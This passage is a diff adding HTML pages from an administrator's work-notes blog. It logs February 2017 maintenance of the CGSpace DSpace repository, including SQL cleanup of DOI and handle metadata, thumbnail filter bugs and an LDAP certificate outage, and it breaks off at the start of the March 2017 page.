+<meta property="article:modified_time" content="2020-04-13T15:30:24+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="February, 2017"/>
+<meta name="twitter:description" content="2017-02-07
+
+An item was mapped twice erroneously again, so I had to remove one of the mappings manually:
+
+dspace=# select * from collection2item where item_id = &#39;80278&#39;;
+  id   | collection_id | item_id
+-------&#43;---------------&#43;---------
+ 92551 |           313 |   80278
+ 92550 |           313 |   80278
+ 90774 |          1051 |   80278
+(3 rows)
+dspace=# delete from collection2item where id = 92551 and item_id = 80278;
+DELETE 1
+
+Create issue on GitHub to track the addition of CCAFS Phase II project tags (#301)
+Looks like we&rsquo;ll be using cg.identifier.ccafsprojectpii as the field name
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "February, 2017",
+  "url": "https://alanorth.github.io/cgspace-notes/2017-02/",
+  "wordCount": "2028",
+  "datePublished": "2017-02-07T07:04:52-08:00",
+  "dateModified": "2020-04-13T15:30:24+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2017-02/">
+
+    <title>February, 2017 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-02/">February, 2017</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2017-02-07T07:04:52-08:00">Tue Feb 07, 2017</time>
+ in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2017-02-07">2017-02-07</h2>
+<ul>
+<li>An item was mapped twice erroneously again, so I had to remove one of the mappings manually:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select * from collection2item where item_id = &#39;80278&#39;;
+  id   | collection_id | item_id
+-------+---------------+---------
+ 92551 |           313 |   80278
+ 92550 |           313 |   80278
+ 90774 |          1051 |   80278
+(3 rows)
+dspace=# delete from collection2item where id = 92551 and item_id = 80278;
+DELETE 1
+</code></pre><ul>
+<li>Create issue on GitHub to track the addition of CCAFS Phase II project tags (<a href="https://github.com/ilri/DSpace/issues/301">#301</a>)</li>
+<li>Looks like we&rsquo;ll be using <code>cg.identifier.ccafsprojectpii</code> as the field name</li>
+</ul>
+<h2 id="2017-02-08">2017-02-08</h2>
+<ul>
+<li>We also need to rename some of the CCAFS Phase I flagships:
+<ul>
+<li>CLIMATE-SMART AGRICULTURAL PRACTICES → CLIMATE-SMART TECHNOLOGIES AND PRACTICES</li>
+<li>CLIMATE RISK MANAGEMENT → CLIMATE SERVICES AND SAFETY NETS</li>
+<li>LOW EMISSIONS AGRICULTURE → LOW EMISSIONS DEVELOPMENT</li>
+<li>POLICIES AND INSTITUTIONS → PRIORITIES AND POLICIES FOR CSA</li>
+</ul>
+</li>
+<li>The climate risk management one doesn&rsquo;t exist, so I will have to ask Magdalena if they want me to add it to the input forms</li>
+<li>Start testing some nearly 500 author corrections that CCAFS sent me:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/CCAFS-Authors-Feb-7.csv -f dc.contributor.author -t &#39;correct name&#39; -m 3 -d dspace -u dspace -p fuuu
+</code></pre><h2 id="2017-02-09">2017-02-09</h2>
+<ul>
+<li>More work on CCAFS Phase II stuff</li>
+<li>Looks like simply adding a new metadata field to <code>dspace/config/registries/cgiar-types.xml</code> and restarting DSpace causes the field to get added to the rregistry</li>
+<li>It requires a restart but at least it allows you to manage the registry programmatically</li>
+<li>It&rsquo;s not a very good way to manage the registry, though, as removing one there doesn&rsquo;t cause it to be removed from the registry, and we always restore from database backups so there would never be a scenario when we needed these to be created</li>
+<li>Testing some corrections on CCAFS Phase II flagships (<code>cg.subject.ccafs</code>):</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i ccafs-flagships-feb7.csv -f cg.subject.ccafs -t correct -m 210 -d dspace -u dspace -p fuuu
+</code></pre><h2 id="2017-02-10">2017-02-10</h2>
+<ul>
+<li>CCAFS said they want to wait on the flagship updates (<code>cg.subject.ccafs</code>) on CGSpace, perhaps for a month or so</li>
+<li>Help Marianne Gadeberg (WLE) with some user permissions as it seems she had previously been using a personal email account, and is now on a CGIAR one</li>
+<li>I manually added her new account to ~25 authorizations that her hold user was on</li>
+</ul>
+<h2 id="2017-02-14">2017-02-14</h2>
+<ul>
+<li>Add <code>SCALING</code> to ILRI subjects (<a href="https://github.com/ilri/DSpace/pull/304">#304</a>), as Sisay&rsquo;s attempts were all sloppy</li>
+<li>Cherry pick some patches from the DSpace 5.7 branch:
+<ul>
+<li>DS-3363 CSV import error says &ldquo;row&rdquo;, means &ldquo;column&rdquo;: f7b6c83e991db099003ee4e28ca33d3c7bab48c0</li>
+<li>DS-3479 avoid adding empty metadata values during import: 329f3b48a6de7fad074d825fd12118f7e181e151</li>
+<li>[DS-3456] 5x Clarify command line options for statisics import/export tools (#1623): 567ec083c8a94eb2bcc1189816eb4f767745b278</li>
+<li>[DS-3458]5x Allow Shard Process to Append to an existing repo: 3c8ecb5d1fd69a1dcfee01feed259e80abbb7749</li>
+</ul>
+</li>
+<li>I still need to test these, especially as the last two which change some stuff with Solr maintenance</li>
+</ul>
+<h2 id="2017-02-15">2017-02-15</h2>
+<ul>
+<li>Update rvm on DSpace Test and CGSpace as there was a <a href="https://github.com/justinsteven/advisories/blob/master/2017_rvm_cd_command_execution.md">security disclosure about versions less than 1.28.0</a></li>
+</ul>
+<h2 id="2017-02-16">2017-02-16</h2>
+<ul>
+<li>Looking at memory info from munin on CGSpace:</li>
+</ul>
+<p><img src="/cgspace-notes/2017/02/meminfo_phisical-week.png" alt="CGSpace meminfo"></p>
+<ul>
+<li>We are using only ~8GB of RAM for applications, and 16GB for caches!</li>
+<li>The Linode machine we&rsquo;re on has 24GB of RAM but only because that&rsquo;s the only instance that had enough disk space for us (384GB)&hellip;</li>
+<li>We should probably look into Google Compute Engine or Digital Ocean where we can get more storage without having to follow a linear increase in instance pricing for CPU/memory as well</li>
+<li>Especially because we only use 2 out of 8 CPUs basically:</li>
+</ul>
+<p><img src="/cgspace-notes/2017/02/cpu-week.png" alt="CGSpace CPU"></p>
+<ul>
+<li>Fix issue with duplicate declaration of in atmire-dspace-xmlui <code>pom.xml</code> (causing non-fatal warnings during the maven build)</li>
+<li>Experiment with making DSpace generate HTTPS handle links, first a change in dspace.cfg or the site&rsquo;s properties file:</li>
+</ul>
+<pre tabindex="0"><code>handle.canonical.prefix = https://hdl.handle.net/
+</code></pre><ul>
+<li>And then a SQL command to update existing records:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://hdl.handle.net&#39;, &#39;https://hdl.handle.net&#39;) where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;uri&#39;);
+UPDATE 58193
+</code></pre><ul>
+<li>Seems to work fine!</li>
+<li>I noticed a few items that have incorrect DOI links (<code>dc.identifier.doi</code>), and after looking in the database I see there are over 100 that are missing the scheme or are just plain wrong:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select distinct text_value from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value not like &#39;http%://%&#39;;
+</code></pre><ul>
+<li>This will replace any that begin with <code>10.</code> and change them to <code>https://dx.doi.org/10.</code>:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;(^10\..+$)&#39;, &#39;https://dx.doi.org/\1&#39;) where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value like &#39;10.%&#39;;
+</code></pre><ul>
+<li>This will get any that begin with <code>doi:10.</code> and change them to <code>https://dx.doi.org/10.x</code>:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;^doi:(10\..+$)&#39;, &#39;https://dx.doi.org/\1&#39;) where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value like &#39;doi:10%&#39;;
+</code></pre><ul>
+<li>Fix DOIs like <code>dx.doi.org/10.</code> to be <code>https://dx.doi.org/10.</code>:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;(^dx.doi.org/.+$)&#39;, &#39;https://dx.doi.org/\1&#39;) where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value like &#39;dx.doi.org/%&#39;;
+</code></pre><ul>
+<li>Fix DOIs like <code>http//</code>:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;^http//(dx.doi.org/.+$)&#39;, &#39;https://dx.doi.org/\1&#39;) where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value like &#39;http//%&#39;;
+</code></pre><ul>
+<li>Fix DOIs like <code>dx.doi.org./</code>:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;(^dx.doi.org\./.+$)&#39;, &#39;https://dx.doi.org/\1&#39;) where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value like &#39;dx.doi.org./%&#39;
+</code></pre><ul>
+<li>Delete some invalid DOIs:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value in (&#39;DOI&#39;,&#39;CPWF Mekong&#39;,&#39;Bulawayo, Zimbabwe&#39;,&#39;bb&#39;);
+</code></pre><ul>
+<li>Fix some other random outliers:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = &#39;https://dx.doi.org/10.1016/j.aquaculture.2015.09.003&#39; where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value = &#39;http:/dx.doi.org/10.1016/j.aquaculture.2015.09.003&#39;;
+dspace=# update metadatavalue set text_value = &#39;https://dx.doi.org/10.5337/2016.200&#39; where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value = &#39;doi: https://dx.doi.org/10.5337/2016.200&#39;;
+dspace=# update metadatavalue set text_value = &#39;https://dx.doi.org/doi:10.1371/journal.pone.0062898&#39; where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value = &#39;Http://dx.doi.org/doi:10.1371/journal.pone.0062898&#39;;
+dspace=# update metadatavalue set text_value = &#39;https://dx.doi.10.1016/j.cosust.2013.11.012&#39; where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value = &#39;http:dx.doi.10.1016/j.cosust.2013.11.012&#39;;
+dspace=# update metadatavalue set text_value = &#39;https://dx.doi.org/10.1080/03632415.2014.883570&#39; where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value = &#39;org/10.1080/03632415.2014.883570&#39;;
+dspace=# update metadatavalue set text_value = &#39;https://dx.doi.org/10.15446/agron.colomb.v32n3.46052&#39; where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value = &#39;Doi: 10.15446/agron.colomb.v32n3.46052&#39;;
+</code></pre><ul>
+<li>And do another round of <code>http://</code> → <code>https://</code> cleanups:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://dx.doi.org&#39;, &#39;https://dx.doi.org&#39;) where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value like &#39;http://dx.doi.org%&#39;;
+</code></pre><ul>
+<li>Run all DOI corrections on CGSpace</li>
+<li>Something to think about here is to write a <a href="https://wiki.lyrasis.org/display/DSDOC5x/Curation+System#CurationSystem-ScriptedTasks">Curation Task</a> in Java to do these sanity checks / corrections every night</li>
+<li>Then we could add a cron job for them and run them from the command line like:</li>
+</ul>
+<pre tabindex="0"><code>[dspace]/bin/dspace curate -t noop -i 10568/79891
+</code></pre><h2 id="2017-02-20">2017-02-20</h2>
+<ul>
+<li>Run all system updates on DSpace Test and reboot the server</li>
+<li>Run CCAFS author corrections on DSpace Test and CGSpace and force a full discovery reindex</li>
+<li>Fix label of CCAFS subjects in Atmire Listings and Reports module</li>
+<li>Help Sisay with SQL commands</li>
+<li>Help Paola from CCAFS with the Atmire Listings and Reports module</li>
+<li>Testing the <code>fix-metadata-values.py</code> script on macOS and it seems like we don&rsquo;t need to use <code>.encode('utf-8')</code> anymore when printing strings to the screen</li>
+<li>It seems this might have only been a temporary problem, as both Python 3.5.2 and 3.6.0 are able to print the problematic string &ldquo;Entwicklung &amp; Ländlicher Raum&rdquo; without the <code>encode()</code> call, but print it as a bytes when it <em>is</em> used:</li>
+</ul>
+<pre tabindex="0"><code>$ python
+Python 3.6.0 (default, Dec 25 2016, 17:30:53)
+&gt;&gt;&gt; print(&#39;Entwicklung &amp; Ländlicher Raum&#39;)
+Entwicklung &amp; Ländlicher Raum
+&gt;&gt;&gt; print(&#39;Entwicklung &amp; Ländlicher Raum&#39;.encode())
+b&#39;Entwicklung &amp; L\xc3\xa4ndlicher Raum&#39;
+</code></pre><ul>
+<li>So for now I will remove the encode call from the script (though it was never used on the versions on the Linux hosts), leading me to believe it really <em>was</em> a temporary problem, perhaps due to macOS or the Python build I was using.</li>
+</ul>
+<h2 id="2017-02-21">2017-02-21</h2>
+<ul>
+<li>Testing regenerating PDF thumbnails, like I started in 2016-11</li>
+<li>It seems there is a bug in <code>filter-media</code> that causes it to process formats that aren&rsquo;t part of its configuration:</li>
+</ul>
+<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/16856 -p &#34;ImageMagick PDF Thumbnail&#34;
+File: earlywinproposal_esa_postharvest.pdf.jpg
+FILTERED: bitstream 13787 (item: 10568/16881) and created &#39;earlywinproposal_esa_postharvest.pdf.jpg&#39;
+File: postHarvest.jpg.jpg
+FILTERED: bitstream 16524 (item: 10568/24655) and created &#39;postHarvest.jpg.jpg&#39;
+</code></pre><ul>
+<li>According to <code>dspace.cfg</code> the ImageMagick PDF Thumbnail plugin should only process PDFs:</li>
+</ul>
+<pre tabindex="0"><code>filter.org.dspace.app.mediafilter.ImageMagickImageThumbnailFilter.inputFormats = BMP, GIF, image/png, JPG, TIFF, JPEG, JPEG 2000
+filter.org.dspace.app.mediafilter.ImageMagickPdfThumbnailFilter.inputFormats = Adobe PDF
+</code></pre><ul>
+<li>I&rsquo;ve sent a message to the mailing list and might file a Jira issue</li>
+<li>Ask Atmire about the failed interpolation of the <code>dspace.internalUrl</code> variable in <code>atmire-cua.cfg</code></li>
+</ul>
+<h2 id="2017-02-22">2017-02-22</h2>
+<ul>
+<li>Atmire said I can add <code>dspace.internalUrl</code> to my build properties and the error will go away</li>
+<li>It should be the local URL for accessing Tomcat from the server&rsquo;s own perspective, ie: http://localhost:8080</li>
+</ul>
+<h2 id="2017-02-26">2017-02-26</h2>
+<ul>
+<li>Find all fields with &ldquo;<a href="http://hdl.handle.net">http://hdl.handle.net</a>&rdquo; values (most are in <code>dc.identifier.uri</code>, but some are in other URL-related fields like <code>cg.link.reference</code>, <code>cg.identifier.dataurl</code>, and <code>cg.identifier.url</code>):</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select distinct metadata_field_id from metadatavalue where resource_type_id=2 and text_value like &#39;http://hdl.handle.net%&#39;;
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://hdl.handle.net&#39;, &#39;https://hdl.handle.net&#39;) where resource_type_id=2 and metadata_field_id IN (25, 113, 179, 219, 220, 223) and text_value like &#39;http://hdl.handle.net%&#39;;
+UPDATE 58633
+</code></pre><ul>
+<li>This works but I&rsquo;m thinking I&rsquo;ll wait on the replacement as there are perhaps some other places that rely on <code>http://hdl.handle.net</code> (grep the code, it&rsquo;s scary how many things are hard coded)</li>
+<li>Send message to dspace-tech mailing list with concerns about this</li>
+</ul>
+<h2 id="2017-02-27">2017-02-27</h2>
+<ul>
+<li>LDAP users cannot log in today, looks to be an issue with CGIAR&rsquo;s LDAP server:</li>
+</ul>
+<pre tabindex="0"><code>$ openssl s_client -connect svcgroot2.cgiarad.org:3269
+CONNECTED(00000003)
+depth=0 CN = SVCGROOT2.CGIARAD.ORG
+verify error:num=20:unable to get local issuer certificate
+verify return:1
+depth=0 CN = SVCGROOT2.CGIARAD.ORG
+verify error:num=21:unable to verify the first certificate
+verify return:1
+---
+Certificate chain
+ 0 s:/CN=SVCGROOT2.CGIARAD.ORG
+   i:/CN=CGIARAD-RDWA-CA
+---
+</code></pre><ul>
+<li>For some reason it is now signed by a private certificate authority</li>
+<li>This error seems to have started on 2017-02-25:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -c &#34;unable to find valid certification path&#34; [dspace]/log/dspace.log.2017-02-*
+[dspace]/log/dspace.log.2017-02-01:0
+[dspace]/log/dspace.log.2017-02-02:0
+[dspace]/log/dspace.log.2017-02-03:0
+[dspace]/log/dspace.log.2017-02-04:0
+[dspace]/log/dspace.log.2017-02-05:0
+[dspace]/log/dspace.log.2017-02-06:0
+[dspace]/log/dspace.log.2017-02-07:0
+[dspace]/log/dspace.log.2017-02-08:0
+[dspace]/log/dspace.log.2017-02-09:0
+[dspace]/log/dspace.log.2017-02-10:0
+[dspace]/log/dspace.log.2017-02-11:0
+[dspace]/log/dspace.log.2017-02-12:0
+[dspace]/log/dspace.log.2017-02-13:0
+[dspace]/log/dspace.log.2017-02-14:0
+[dspace]/log/dspace.log.2017-02-15:0
+[dspace]/log/dspace.log.2017-02-16:0
+[dspace]/log/dspace.log.2017-02-17:0
+[dspace]/log/dspace.log.2017-02-18:0
+[dspace]/log/dspace.log.2017-02-19:0
+[dspace]/log/dspace.log.2017-02-20:0
+[dspace]/log/dspace.log.2017-02-21:0
+[dspace]/log/dspace.log.2017-02-22:0
+[dspace]/log/dspace.log.2017-02-23:0
+[dspace]/log/dspace.log.2017-02-24:0
+[dspace]/log/dspace.log.2017-02-25:7
+[dspace]/log/dspace.log.2017-02-26:8
+[dspace]/log/dspace.log.2017-02-27:90
+</code></pre><ul>
+<li>Also, it seems that we need to use a different user for LDAP binds, as we&rsquo;re still using the temporary one from the root migration, so maybe we can go back to the previous user we were using</li>
+<li>So it looks like the certificate is invalid AND the bind users we had been using were deleted</li>
+<li>Biruk Debebe recreated the bind user and now we are just waiting for CGNET to update their certificates</li>
+<li>Regarding the <code>filter-media</code> issue I found earlier, it seems that the ImageMagick PDF plugin will also process JPGs if they are in the &ldquo;Content Files&rdquo; (aka <code>ORIGINAL</code>) bundle</li>
+<li>The problem likely lies in the logic of <code>ImageMagickThumbnailFilter.java</code>, as <code>ImageMagickPdfThumbnailFilter.java</code> extends it</li>
+<li>Run CIAT corrections on CGSpace</li>
+</ul>
+<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;3026b1de-9302-4f3e-85ab-ef48da024eb2&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value = &#39;International Center for Tropical Agriculture&#39;;
+</code></pre><ul>
+<li>CGNET has fixed the certificate chain on their LDAP server</li>
+<li>Redeploy CGSpace and DSpace Test to on latest <code>5_x-prod</code> branch with fixes for LDAP bind user</li>
+<li>Run all system updates on CGSpace server and reboot</li>
+</ul>
+<h2 id="2017-02-28">2017-02-28</h2>
+<ul>
+<li>After running the CIAT corrections and updating the Discovery and authority indexes, there is still no change in the number of items listed for CIAT in Discovery</li>
+<li>Ah, this is probably because some items have the <code>International Center for Tropical Agriculture</code> author twice, which I first noticed in 2016-12 but couldn&rsquo;t figure out how to fix</li>
+<li>I think I can do it by first exporting all metadatavalues that have the author <code>International Center for Tropical Agriculture</code></li>
+</ul>
+<pre tabindex="0"><code>dspace=# \copy (select resource_id, metadata_value_id from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value=&#39;International Center for Tropical Agriculture&#39;) to /tmp/ciat.csv with csv;
+COPY 1968
+</code></pre><ul>
+<li>And then use awk to print the duplicate lines to a separate file:</li>
+</ul>
+<pre tabindex="0"><code>$ awk -F&#39;,&#39; &#39;seen[$1]++&#39; /tmp/ciat.csv &gt; /tmp/ciat-dupes.csv
+</code></pre><ul>
+<li>From that file I can create a list of 279 deletes and put them in a batch script like:</li>
+</ul>
+<pre tabindex="0"><code>delete from metadatavalue where resource_type_id=2 and metadata_field_id=3 and metadata_value_id=2742061;
+</code></pre>
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2017-03/index.html b/docs/2017-03/index.html
new file mode 100644
index 000000000..51e3ea596
--- /dev/null
+++ b/docs/2017-03/index.html
@@ -0,0 +1,409 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="March, 2017" />
+<meta property="og:description" content="2017-03-01
+
+Run the 279 CIAT author corrections on CGSpace
+
+2017-03-02
+
+Skype with Michael and Peter, discussing moving the CGIAR Library to CGSpace
+CGIAR people possibly open to moving content, redirecting library.cgiar.org to CGSpace and letting CGSpace resolve their handles
+They might come in at the top level in one &ldquo;CGIAR System&rdquo; community, or with several communities
+I need to spend a bit of time looking at the multiple handle support in DSpace and see if new content can be minted in both handles, or just one?
+Need to send Peter and Michael some notes about this in a few days
+Also, need to consider talking to Atmire about hiring them to bring ORCiD metadata to REST / OAI
+Filed an issue on DSpace issue tracker for the filter-media bug that causes it to process JPGs even when limiting to the PDF thumbnail plugin: DS-3516
+Discovered that the ImageMagic filter-media plugin creates JPG thumbnails with the CMYK colorspace when the source PDF is using CMYK
+Interestingly, it seems DSpace 4.x&rsquo;s thumbnails were sRGB, but forcing regeneration using DSpace 5.x&rsquo;s ImageMagick plugin creates CMYK JPGs if the source PDF was CMYK (see 10568/51999):
+
+$ identify ~/Desktop/alc_contrastes_desafios.jpg
+/Users/aorth/Desktop/alc_contrastes_desafios.jpg JPEG 464x600 464x600&#43;0&#43;0 8-bit CMYK 168KB 0.000u 0:00.000
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2017-03/" />
+<meta property="article:published_time" content="2017-03-01T17:08:52+02:00" />
+<meta property="article:modified_time" content="2020-04-13T15:30:24+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="March, 2017"/>
+<meta name="twitter:description" content="2017-03-01
+
+Run the 279 CIAT author corrections on CGSpace
+
+2017-03-02
+
+Skype with Michael and Peter, discussing moving the CGIAR Library to CGSpace
+CGIAR people possibly open to moving content, redirecting library.cgiar.org to CGSpace and letting CGSpace resolve their handles
+They might come in at the top level in one &ldquo;CGIAR System&rdquo; community, or with several communities
+I need to spend a bit of time looking at the multiple handle support in DSpace and see if new content can be minted in both handles, or just one?
+Need to send Peter and Michael some notes about this in a few days
+Also, need to consider talking to Atmire about hiring them to bring ORCiD metadata to REST / OAI
+Filed an issue on DSpace issue tracker for the filter-media bug that causes it to process JPGs even when limiting to the PDF thumbnail plugin: DS-3516
+Discovered that the ImageMagic filter-media plugin creates JPG thumbnails with the CMYK colorspace when the source PDF is using CMYK
+Interestingly, it seems DSpace 4.x&rsquo;s thumbnails were sRGB, but forcing regeneration using DSpace 5.x&rsquo;s ImageMagick plugin creates CMYK JPGs if the source PDF was CMYK (see 10568/51999):
+
+$ identify ~/Desktop/alc_contrastes_desafios.jpg
+/Users/aorth/Desktop/alc_contrastes_desafios.jpg JPEG 464x600 464x600&#43;0&#43;0 8-bit CMYK 168KB 0.000u 0:00.000
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "March, 2017",
+  "url": "https://alanorth.github.io/cgspace-notes/2017-03/",
+  "wordCount": "1538",
+  "datePublished": "2017-03-01T17:08:52+02:00",
+  "dateModified": "2020-04-13T15:30:24+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2017-03/">
+
+    <title>March, 2017 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-03/">March, 2017</a></h2>
+    <p class="blog-post-meta">
